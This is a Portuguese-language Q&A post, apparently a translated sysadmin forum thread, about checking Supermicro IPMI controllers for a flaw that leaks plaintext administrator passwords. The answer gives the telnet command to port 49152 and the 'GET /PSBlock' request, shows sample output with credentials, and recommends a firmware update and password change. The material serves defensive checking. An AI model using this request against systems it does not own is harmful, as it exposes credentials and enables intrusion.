Eu tenho alguns servidores Supermicro com IPMI em execução e, conforme descrito neste blog ( http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras ), há uma vulnerabilidade crítica a obtenha senhas de administrador de texto sem formatação a partir de qualquer local remoto.
Como verificar se minha placa mãe do servidor está comprometida?
Respostas:
Simplesmente telnet para o endereço IP IPMI na porta 49152 e faça uma solicitação GET específica. Você deve obter seus usuários e senhas se estiver comprometido.
telnet server.example.com 49152
Após a conexão solicitar GET /PSBlocke assistir aos resultados, deve ser algo como isto:
Trying 192.168.1.22...
Connected to server.example.com.
Escape character is '^]'.
GET /PSBlock
Responda:
=%}?
0adminADMIN**yourPlaintextPasswordHere**;TTroot**AnotherPassword**???%?v?i?o???DDD@??
Para resolver esse problema, atualize o firmware do IPMI para a versão mais recente. O firmware é específico ao seu controlador IPMI, portanto, você deve obter o especificado no site da Supermicro.
Depois de atualizar o firmware, altere suas senhas .